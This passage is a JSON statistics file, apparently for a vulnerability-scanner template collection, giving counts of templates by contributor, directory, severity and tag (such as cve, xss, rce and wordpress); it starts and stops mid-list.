adrobot","count":65},{"name":"idealphase","count":64},{"name":"zzeitlin","count":64},{"name":"iamnoooob","count":63},{"name":"akincibor","count":59},{"name":"rootxharsh","count":56},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":52},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"johnk3r","count":40},{"name":"j4vaovo","count":35},{"name":"c-sh0","count":35},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"pwnhxl","count":28},{"name":"ice3man","count":28},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":24},{"name":"harsh","count":23},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"mastercho","count":22},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"shaikhyaser","count":16},{"name":"random-robbie","count":16},{"name":"0xpugazh","count":16},{"name":"lu4nx","count":16},{"name":"unapibageek","count":15},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"bhutch","count":14},{"name":"r3dg33k","count":14},{"name":"tenbird","count":14},{"name":"dogasantos","count":14},{"name":"milo2012","count":14},{"name":"sharath","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"0ri2n","count":13},{"name":"elsfa7110","count":13},{"name":"nullfuzz","count":13},{"name":"kazet","count":12},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"logicalhunter","count":10},{"name":"co5mos","count":10},{"name":"random_robbie","count":10},{"name":"0x240x23elu","count":10},{"name":"hackergautam","count":10},{"name":"alph4byt3","count":10},{"name":"nadino","count":10},{"name":"adamcrosser","count":9},{"name":"fabaff","count":9},{"name":"oppsec","count":9},{"name":"olearycrew","count":9},{"name":"momika233","count":9},{"name":"emadshanab","count":9},{"name":"initstring","count":9},{"name":"veshraj","count":8},{"name":"irshad ahamed","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"_0xf4n9x_","count":8},{"name":"noraj","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"huta0","count":7},{"name":"tarunkoyalwar","count":7},{"name":"nodauf","count":7},{"name":"leovalcante","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"its0x08","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"amit-jd","count":7},{"name":"kophjager007","count":7},{"name":"caspergn","count":7},{"name":"ja1sh","count":6},{"name":"gitlab red team","count":6},{"name":"byt3bl33d3r","count":6},{"name":"devang-solanki","count":6},{"name":"clem9669","count":6},{"name":"justaacat","count":6},{"name":"kazgangap","count":6},{"name":"evan rubinstein","count":6},{"name":"hahwul","count":6},{"name":"megamansec","count":6},{"name":"xelkomy","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"kh4sh3i","count":5},{"name":"r12w4n","count":5},{"name":"gtrrnr","count":5},{"name":"andreluna","count":5},{"name":"robotshell","count":5},{"name":"vicrack","count":5},{"name":"lucky0x0d","count":5},{"name":"s0obi","count":5},{"name":"arm!tage","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"powerexploit","count":5},{"name":"prajiteshsingh","count":5},{"name":"defr0ggy","count":5},{"name":"panch0r3d","count":5},{"name":"r3naissance","count":5},{"name":"your3cho","count":5},{"name":"ganofins","count":5},{"name":"podalirius","count":5},{"name":"mr-xn","count":5},{"name":"shine","count":5},{"name":"lum8rjack","count":4},{"name":"heeress","count":4},{"name":"cookiehanhoan","count":4},{"name":"king-alexander","count":4},{"name":"shankar acharya","count":4},{"name":"ice3man543","count":4},{"name":"xxcdd","count":4},{"name":"ggranjus","count":4},{"name":"wisnupramoedya","count":4},{"name":"k0pak4","count":4},{"name":"3th1c_yuk1","count":4},{"name":"dolev farhi","count":4},{"name":"jpg0mez","count":4},{"name":"incogbyte","count":4},{"name":"tanq16","count":4},{"name":"e_schultze_","count":4},{"name":"iamnooob","count":4},{"name":"dadevel","count":4},{"name":"pulsesecurity.co.nz","count":4},{"name":"h1ei1","count":4},{"name":"scent2d","count":4},{"name":"nybble04","count":4},{"name":"m4lwhere","count":4},{"name":"0xr2r","count":4},{"name":"coldfish","count":3},{"name":"lark-lab","count":3},{"name":"vagnerd","count":3},{"name":"dudez","count":3},{"name":"cheesymoon","count":3},{"name":"taielab","count":3},{"name":"bernardofsr","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"atomiczsec","count":3},{"name":"skeltavik","count":3},{"name":"shifacyclewala","count":3},{"name":"evergreencartoons","count":3},{"name":"binaryfigments","count":3},{"name":"dr0pd34d","count":3},{"name":"whoever","count":3},{"name":"parth","count":3},{"name":"lucasljm2001","count":3},{"name":"farish","count":3},{"name":"impramodsargar","count":3},{"name":"me9187","count":3},{"name":"flx","count":3},{"name":"mavericknerd","count":3},{"name":"f1tz","count":3},{"name":"jarijaas","count":3},{"name":"fxploit","count":3},{"name":"badboycxcc","count":3},{"name":"imjust0","count":3},{"name":"splint3r7","count":3},{"name":"_generic_human_","count":3},{"name":"ekrause","count":3},{"name":"randomrobbie","count":3},{"name":"swissky","count":3},{"name":"isacaya","count":3},{"name":"ph33r","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"thomas_from_offensity","count":3},{"name":"huowuzhao","count":3},{"name":"davidmckennirey","count":3},{"name":"andydoering","count":3},{"name":"vsh00t","count":3},{"name":"emenalf","count":3},{"name":"canberbamber","count":3},{"name":"arcc","count":3},{"name":"j3ssie","count":3},{"name":"aringo","count":3},{"name":"alifathi-h1","count":3},{"name":"e1a","count":3},{"name":"xianke","count":3},{"name":"unstabl3","count":3},{"name":"ambassify","count":3},{"name":"salts","count":3},{"name":"fyoorer","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"sushantkamble","count":3},{"name":"true13","count":3},{"name":"matt galligan","count":3},{"name":"dbrwsky","count":2},{"name":"koti2","count":2},{"name":"nuk3s3c","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"0xelkomy","count":2},{"name":"g4l1t0","count":2},{"name":"nkxxkn","count":2},{"name":"paradessia","count":2},{"name":"lotusdll","count":2},{"name":"0xnirvana","count":2},{"name":"brucelsone","count":2},{"name":"raesene","count":2},{"name":"mohammedsaneem","count":2},{"name":"zomsop82","count":2},{"name":"uomogrande","count":2},{"name":"codexlynx","count":2},{"name":"joeldeleep","count":2},{"name":"danielmofer","count":2},{"name":"herry","count":2},{"name":"bmcel","count":2},{"name":"0xcrypto","count":2},{"name":"v0idc0de","count":2},{"name":"randomdhiraj","count":2},{"name":"joshlarsen","count":2},{"name":"ree4pwn","count":2},{"name":"davidegirardi","count":2},{"name":"paperpen","count":2},{"name":"kiblyn11","count":2},{"name":"kishore-hariram","count":2},{"name":"n-thumann","count":2},{"name":"vavkamil","count":2},{"name":"h0j3n","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"notnotnotveg","count":2},{"name":"supras","count":2},{"name":"moritz nentwig","count":2},{"name":"bananabr","count":2},{"name":"liwermor","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"luci","count":2},{"name":"geekby","count":2},{"name":"0xsapra","count":2},{"name":"socketz","count":2},{"name":"zy9ard3","count":2},{"name":"christianpoeschl","count":2},{"name":"supr4s","count":2},{"name":"mzack9999","count":2},{"name":"udit_thakkur","count":2},{"name":"mrharshvardhan","count":2},{"name":"amsda","count":2},{"name":"d4vy","count":2},{"name":"kre80r","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"thezakman","count":2},{"name":"dogancanbakir","count":2},{"name":"shankaracharya","count":2},{"name":"arliya","count":2},{"name":"dahse89","count":2},{"name":"clarkvoss","count":2},{"name":"666asd","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"redteambrasil","count":2},{"name":"ehsahil","count":2},{"name":"gal nagli","count":2},{"name":"hackerarpan","count":2},{"name":"cckuakilong","count":2},{"name":"danmcinerney","count":2},{"name":"pxmme1337","count":2},{"name":"8arthur","count":2},{"name":"bp0lr","count":2},{"name":"y4er","count":2},{"name":"charles d.","count":2},{"name":"pbuff07","count":2},{"name":"z0ne","count":2},{"name":"github.com/its0x08","count":2},{"name":"afaq","count":2},{"name":"6mile","count":2},{"name":"bing0o","count":2},{"name":"cocxanh","count":2},{"name":"joshua rogers","count":2},{"name":"hetroublemakr","count":2},{"name":"wa1tf0rme","count":2},{"name":"streetofhackerr007","count":2},{"name":"usdag","count":2},{"name":"florianmaak","count":2},{"name":"nvn1729","count":2},{"name":"c4sper0","count":2},{"name":"ep1csage","count":2},{"name":"maximus decimus","count":2},{"name":"x1m_martijn","count":2},{"name":"ajaysenr","count":2},{"name":"myztique","count":2},{"name":"martincodes-de","count":2},{"name":"convisoappsec","count":2},{"name":"rafaelwdornelas","count":2},{"name":"thevillagehacker","count":2},{"name":"thardt-praetorian","count":2},{"name":"shelled","count":2},{"name":"msegoviag","count":2},{"name":"korteke","count":2},{"name":"manas_harsh","count":2},{"name":"sascha brendel","count":2},{"name":"c3l3si4n","count":2},{"name":"sinkettu","count":2},{"name":"w4cky_","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"k11h-de","count":2},{"name":"ayadim","count":2},{"name":"thabisocn","count":2},{"name":"parzival","count":2},{"name":"brenocss","count":2},{"name":"sbani","count":2},{"name":"foulenzer","count":2},{"name":"0xsmiley","count":2},{"name":"pussycat0","count":1},{"name":"juliosmelo","count":1},{"name":"rotembar","count":1},{"name":"carson chan","count":1},{"name":"elder tao","count":1},{"name":"fq_hsu","count":1},{"name":"miryangjung","count":1},{"name":"osamahamad","count":1},{"name":"dale clarke","count":1},{"name":"w8ay","count":1},{"name":"exid","count":1},{"name":"luciannitescu","count":1},{"name":"regala_","count":1},{"name":"daffianfo","count":1},{"name":"_darrenmartyn","count":1},{"name":"hexcat","count":1},{"name":"marcio mendes","count":1},{"name":"jna1","count":1},{"name":"colbyjack1134","count":1},{"name":"dabla","count":1},{"name":"mbmy","count":1},{"name":"mihhailsokolov","count":1},{"name":"sanineng","count":1},{"name":"apt-mirror","count":1},{"name":"igibanez","count":1},{"name":"lrtk-coder","count":1},{"name":"0xceba","count":1},{"name":"knassar702","count":1},{"name":"mayankpandey01","count":1},{"name":"th3r4id","count":1},{"name":"harshinsecurity","count":1},{"name":"hakluke","count":1},{"name":"hotpot","count":1},{"name":"ling","count":1},{"name":"phillipo","count":1},{"name":"duty_1g","count":1},{"name":"rinolock","count":1},{"name":"bughuntersurya","count":1},{"name":"sdcampbell","count":1},{"name":"cravaterouge","count":1},{"name":"alexrydzak","count":1},{"name":"2rs3c","count":1},{"name":"arr0way","count":1},{"name":"numan türle","count":1},{"name":"banana69","count":1},{"name":"myst7ic","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"p-l-","count":1},{"name":"jeya seelan","count":1},{"name":"axrk","count":1},{"name":"mantissts","count":1},{"name":"lamscun","count":1},{"name":"brianlam38","count":1},{"name":"f1she3","count":1},{"name":"michael wedl","count":1},{"name":"petruknisme","count":1},{"name":"absshax","count":1},{"name":"yusakie","count":1},{"name":"sttlr","count":1},{"name":"gonski","count":1},{"name":"queencitycyber","count":1},{"name":"elitebaz","count":1},{"name":"fur1na","count":1},{"name":"danfaizer","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"kresec","count":1},{"name":"zandros0","count":1},{"name":"akash.c","count":1},{"name":"abbas.heybati","count":1},{"name":"hardik-rathod","count":1},{"name":"prettyboyaaditya","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"j33n1k4","count":1},{"name":"husain","count":1},{"name":"vzamanillo","count":1},{"name":"aresx","count":1},{"name":"cbadke","count":1},{"name":"r3s ost","count":1},{"name":"s1r1us","count":1},{"name":"akokonunes","count":1},{"name":"houdinis","count":1},{"name":"pry0cc","count":1},{"name":"willd96","count":1},{"name":"rodnt","count":1},{"name":"esonhugh","count":1},{"name":"pascalheidmann","count":1},{"name":"ok_bye_now","count":1},{"name":"chron0x","count":1},{"name":"hakimkt","count":1},{"name":"wabafet","count":1},{"name":"udinchan","count":1},{"name":"kailashbohara","count":1},{"name":"mordavid","count":1},{"name":"arall","count":1},{"name":"0xtavian","count":1},{"name":"millermedia","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"luqmaan hadia","count":1},{"name":"thebinitghimire","count":1},{"name":"marcos_iaf","count":1},{"name":"soyelmago","count":1},{"name":"ringo","count":1},{"name":"nagli","count":1},{"name":"mass0ma","count":1},{"name":"erethon","count":1},{"name":"eremit4","count":1},{"name":"iphantasmic","count":1},{"name":"phyr3wall","count":1},{"name":"dmartyn","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"xeldax","count":1},{"name":"josecosta","count":1},{"name":"tirtha_mandal","count":1},{"name":"m0ck3d","count":1},{"name":"danigoland","count":1},{"name":"rumble773","count":1},{"name":"jcockhren","count":1},{"name":"whynotke","count":1},{"name":"qianbenhyu","count":1},{"name":"tea","count":1},{"name":"ooooooo_q","count":1},{"name":"gboddin","count":1},{"name":"hateshape","count":1},{"name":"drfabiocastro","count":1},{"name":"irshadahamed","count":1},{"name":"aaban solutions","count":1},{"name":"imhunterand","count":1},{"name":"vinit989","count":1},{"name":"luskabol","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"httpvoid","count":1},{"name":"orpheus","count":1},{"name":"r3nz0","count":1},{"name":"deena","count":1},{"name":"geraldino2","count":1},{"name":"sshell","count":1},{"name":"kabirsuda","count":1},{"name":"borna nematzadeh","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"jrolf","count":1},{"name":"youngpope","count":1},{"name":"af001","count":1},{"name":"notwhy","count":1},{"name":"alperenkesk","count":1},{"name":"mhdsamx","count":1},{"name":"zn9988","count":1},{"name":"momen eldawakhly","count":1},{"name":"dwbzn","count":1},{"name":"tehtbl","count":1},{"name":"null_hypothesis","count":1},{"name":"pratik khalane","count":1},{"name":"galoget","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"liquidsec","count":1},{"name":"0xrod","count":1},{"name":"notsoevilweasel","count":1},{"name":"manasmbellani","count":1},{"name":"h4sh5","count":1},{"name":"adrianmf","count":1},{"name":"matt miller","count":1},{"name":"yavolo","count":1},{"name":"revblock","count":1},{"name":"palanichamy_perumal","count":1},{"name":"jaskaran","count":1},{"name":"lark lab","count":1},{"name":"olewagner","count":1},{"name":"makyotox","count":1},{"name":"fpatrik","count":1},{"name":"ahmed abou-ela","count":1},{"name":"bywalks","count":1},{"name":"h4kux","count":1},{"name":"sak1","count":1},{"name":"metascan","count":1},{"name":"retr02332","count":1},{"name":"evolutionsec","count":1},{"name":"droberson","count":1},{"name":"davidfegyver","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"d0rkerdevil","count":1},{"name":"miguelsegoviagil","count":1},{"name":"hyunsoo-ds","count":1},{"name":"barthy.koeln","count":1},{"name":"xc1ym","count":1},{"name":"mariam tariq","count":1},{"name":"xshuden","count":1},{"name":"skylark-lab","count":1},{"name":"exceed","count":1},{"name":"jiheon-dev","count":1},{"name":"mayank_pandey01","count":1},{"name":"christbowel","count":1},{"name":"d4ly","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"puben","count":1},{"name":"joaonevess","count":1},{"name":"michal-mikolas","count":1},{"name":"noamrathaus","count":1},{"name":"pphuahua","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lingtren","count":1},{"name":"yiran","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"yashanand155","count":1},{"name":"rojanrijal","count":1},{"name":"ofjaaah","count":1},{"name":"nielsing","count":1},{"name":"amnotacat","count":1},{"name":"dorkerdevil","count":1},{"name":"rschio","count":1},{"name":"evan rubinstien","count":1},{"name":"therealtoastycat","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"jub0bs","count":1},{"name":"pudsec","count":1},{"name":"egemenkochisarli","count":1},{"name":"elmahdi","count":1},{"name":"zinminphy0","count":1},{"name":"freakyclown","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"ohlinge","count":1},{"name":"couskito","count":1},{"name":"sicksec","count":1},{"name":"fopina","count":1},{"name":"ndmalc","count":1},{"name":"mabdullah22","count":1},{"name":"tirtha","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"kiks7","count":1},{"name":"act1on3","count":1},{"name":"berkdusunur","count":1},{"name":"remonsec","count":1},{"name":"godfatherorwa","count":1},{"name":"undefl0w","count":1},{"name":"un-fmunozs","count":1},{"name":"none","count":1},{"name":"high","count":1},{"name":"pdp","count":1},{"name":"opencirt","count":1},{"name":"technicaljunkie","count":1},{"name":"infosecsanyam","count":1},{"name":"ap3r","count":1},{"name":"viondexd","count":1},{"name":"ptonewreckin","count":1},{"name":"amirmsafari","count":1},{"name":"nuts7","count":1},{"name":"win3zz","count":1},{"name":"caon","count":1},{"name":"justmumu","count":1},{"name":"patrick pirker","count":1},{"name":"b0yd","count":1},{"name":"micha3lb3n","count":1},{"name":"carrot2","count":1},{"name":"compr00t","count":1},{"name":"vikas kundu","count":1},{"name":"shivampand3y","count":1},{"name":"0xcharan","count":1},{"name":"k3rwin","count":1},{"name":"dk999","count":1},{"name":"omarkurt","count":1},{"name":"noobexploiter","count":1},{"name":"shivanshkhari","count":1},{"name":"amir-h-fallahi","count":1},{"name":"affix","count":1},{"name":"andirrahmani1","count":1},{"name":"ipanda","count":1},{"name":"dievus","count":1},{"name":"mlec","count":1},{"name":"open-sec","count":1},{"name":"allenwest24","count":1},{"name":"vulnspace","count":1},{"name":"wpsec","count":1},{"name":"ramkrishna sawant","count":1},{"name":"mesaglio","count":1},{"name":"mr.bobo hp","count":1},{"name":"xcapri","count":1},{"name":"mah3sec_","count":1},{"name":"dali","count":1},{"name":"kurohost","count":1},{"name":"hazana","count":1},{"name":"jbertman","count":1},{"name":"ramondunker","count":1},{"name":"bjxsec","count":1},{"name":"topscoder","count":1},{"name":"jteles","count":1},{"name":"kareemse1im","count":1},{"name":"aaronchen0","count":1},{"name":"byobin","count":1},{"name":"ola456","count":1},{"name":"realexp3rt","count":1},{"name":"sinsinology","count":1},{"name":"pepitoh","count":1},{"name":"iampritam","count":1},{"name":"pjborah","count":1},{"name":"shockwave","count":1},{"name":"calumjelrick","count":1},{"name":"mukundbhuva","count":1},{"name":"jc175","count":1},{"name":"yuansec","count":1},{"name":"kaizensecurity","count":1},{"name":"bugvsme","count":1},{"name":"jacalynli","count":1},{"name":"mchklt","count":1},{"name":"kiransau","count":1},{"name":"co0nan","count":1},{"name":"y0no","count":1},{"name":"tangxiaofeng7","count":1},{"name":"majidmc2","count":1},{"name":"aringo-bf","count":1},{"name":"ahmetpergamum","count":1},{"name":"arqsz","count":1},{"name":"francescocarlucci","count":1},{"name":"zsusac","count":1},{"name":"savik","count":1},{"name":"ahmed sherif","count":1},{"name":"bjhulst","count":1},{"name":"lethargynavigator","count":1},{"name":"am0nt31r0","count":1},{"name":"0xkayala","count":1},{"name":"harryha","count":1},{"name":"b4uh0lz","count":1},{"name":"kchason","count":1},{"name":"0xceeb","count":1},{"name":"shelld3v","count":1},{"name":"bad5ect0r","count":1},{"name":"unblvr1","count":1},{"name":"exploitation","count":1},{"name":"pwnwithlove","count":1},{"name":"ransomsec","count":1},{"name":"0xteles","count":1},{"name":"shifacyclewla","count":1},{"name":"yashgoti","count":1},{"name":"nobody","count":1},{"name":"aayush vishnoi","count":1},{"name":"juicypotato1","count":1},{"name":"aron molnar","count":1},{"name":"lixts","count":1},{"name":"th3.d1p4k","count":1},{"name":"zhenwarx","count":1},{"name":"ilovebinbash","count":1},{"name":"adamparsons","count":1},{"name":"sospiro","count":1},{"name":"ledoubletake","count":1},{"name":"piyushchhiroliya","count":1},{"name":"smaranchand","count":1},{"name":"f0xy","count":1},{"name":"rotemreiss","count":1},{"name":"mammad_rahimzada","count":1},{"name":"w0tx","count":1},{"name":"watchtowr","count":1},{"name":"blckraven","count":1},{"name":"hanlaomo","count":1},{"name":"furkansenan","count":1},{"name":"ph33rr","count":1},{"name":"bartu utku sarp","count":1},{"name":"floriandewald","count":1},{"name":"domenicoveneziano","count":1},{"name":"yaser_s","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"_c0wb0y_","count":1},{"name":"thirukrishnan","count":1},{"name":"professorabhay","count":1},{"name":"andysvints","count":1},{"name":"noah @thesubtlety","count":1},{"name":"aravind","count":1},{"name":"0xprial","count":1},{"name":"unp4ck","count":1},{"name":"1nf1n7y","count":1},{"name":"push4d","count":1},{"name":"toufik-airane","count":1},{"name":"philippdelteil","count":1},{"name":"b0rn2r00t","count":1},{"name":"xstp","count":1},{"name":"official_blackhat13","count":1},{"name":"intx0x80","count":1},{"name":"adnanekhan","count":1},{"name":"natto97","count":1},{"name":"jas37","count":1},{"name":"paper-pen","count":1},{"name":"sec_hawk","count":1},{"name":"oscarintherocks","count":1},{"name":"furkansayim","count":1},{"name":"izn0u","count":1},{"name":"petergrifin","count":1},{"name":"rivalsec","count":1},{"name":"ky9oss","count":1},{"name":"ayadi","count":1},{"name":"chesterblue","count":1},{"name":"alex","count":1},{"name":"becivells","count":1},{"name":"patralos","count":1},{"name":"ynnirc","count":1},{"name":"0xd0ff9","count":1},{"name":"lbb","count":1},{"name":"sorrowx3","count":1},{"name":"lstatro","count":1},{"name":"hlop","count":1},{"name":"akshansh","count":1},{"name":"s1r1u5_","count":1},{"name":"mubassirpatel","count":1},{"name":"carlosvieira","count":1},{"name":"luqman","count":1},{"name":"0xh7ml","count":1},{"name":"charanrayudu","count":1},{"name":"t3l3machus","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kagamigawa","count":1},{"name":"booboohq","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"schniggie","count":1},{"name":"chetgan","count":1},{"name":"shreyapohekar","count":1},{"name":"spac3wh1te","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"djoevanka","count":1},{"name":"erikowen","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"unkl4b","count":1},{"name":"elouhi","count":1},{"name":"secthebit","count":1},{"name":"unknown","count":1},{"name":"rubina119","count":1},{"name":"west-wise","count":1},{"name":"naglis","count":1},{"name":"_harleo","count":1},{"name":"zeyad azima","count":1},{"name":"jaimin gondaliya","count":1},{"name":"0xparth","count":1},{"name":"failopen","count":1},{"name":"amanrawat","count":1},{"name":"8authur","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"gpiechnik2","count":1},{"name":"screamy","count":1},{"name":"kr1shna4garwal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"nerrorsec","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sherlocksecurity","count":1},{"name":"whotwagner","count":1},{"name":"tim_koopmans","count":1},{"name":"flag007","count":1},{"name":"arjunchandarana","count":1},{"name":"wlayzz","count":1},{"name":"0h1in9e","count":1},{"name":"viniciuspereiras","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"hczdmr","count":1},{"name":"lady_bug","count":1},{"name":"jonathanwalker","count":1},{"name":"brabbit10","count":1},{"name":"adilsoybali","count":1},{"name":"jbaines-r7","count":1},{"name":"invisiblethreat","count":1},{"name":"anon-artist","count":1},{"name":"archer","count":1},{"name":"ldionmarcil","count":1},{"name":"clment cruchet","count":1},{"name":"shiar","count":1},{"name":"higor melgaço","count":1},{"name":"manuelbua","count":1},{"name":"ruppde","count":1},{"name":"babybash","count":1},{"name":"denandz","count":1},{"name":"stupidfish","count":1},{"name":"shiva (strobes security)","count":1},{"name":"nytr0gen","count":1},{"name":"miroslavsotak","count":1},{"name":"fmunozs","count":1},{"name":"omarjezi","count":1},{"name":"jeya.seelan","count":1},{"name":"alevsk","count":1},{"name":"thelicato","count":1},{"name":"narluin","count":1},{"name":"5up3r541y4n","count":1},{"name":"jfbes","count":1},{"name":"udyz","count":1},{"name":"guax1","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"sickwell","count":1},{"name":"retr0","count":1},{"name":"breno_css","count":1}],"directory":[{"name":"http","count":7355},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":136},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":56},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3645},{"name":"high","count":1686},{"name":"medium","count":1503},{"name":"critical","count":1009},{"name":"low","count":265},{"name":"unknown","count":38}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2474},{"name":"panel","count":1133},{"name":"wordpress","count":973},{"name":"exposure","count":908},{"name":"xss","count":904},{"name":"wp-plugin","count":844},{"name":"osint","count":804},{"name":"tech","count":674},{"name":"lfi","count":654},{"name":"misconfig","count":606},{"name":"edb","count":599},{"name":"rce","count":591},{"name":"packetstorm","count":530},{"name":"wpscan","count":495},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":419},{"name":"cve2023","count":364},{"name":"unauth","count":363},{"name":"sqli","count":352},{"name":"file","count":346},{"name":"authenticated","count":342},{"name":"intrusive","count":299},{"name":"kev","count":268},{"name":"detect","count":259},{"name":"login","count":259},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":221},{"name":"config","count":220},{"name":"top-200","count":215},{"name":"default-login","count":211},{"name":"osint-social","count":210},{"name":"network","count":194},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":188},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":129},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cms","count":110},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"install","count":107},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":89},{"name":"disclosure","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"cve2024","count":63},{"name":"adobe","count":62},{"name":"js","count":62},{"name":"ir","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":59},{"name":"cve2016","count":57},{"name":"atlassian","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"enum","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"php","count":44},{"name":"jndi","count":44},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"deserialization","count":43},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"springboot","count":41},{"name":"misc","count":39},{"name":"cnvd","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"tls","count":30},{"name":"ec2","count":30},{"name":"wp-theme","count":29},{"name":"dlink","count":29},{"name":"api","count":28},{"name":"gitlab","count":28},{"name":"ssh","count":28},{"name":"k8s","count":28},{"name":"bestwebsoft","count":27},{"name":"fortinet","count":27},{"name":"citrix","count":27},{"name":"cve2012","count":26},{"name":"proxy","count":26},{"name":"firewall","count":25},{"name":"lfr","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"weaver","count":25},{"name":"dns","count":24},{"name":"zoho","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"file-upload","count":23},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"s3","count":22},{"name":"dast","count":21},{"name":"printer","count":21},{"name":"github","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"grafana","count":19},{"name":"ftp","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"coldfusion","count":18},{"name":"mail","count":17},{"na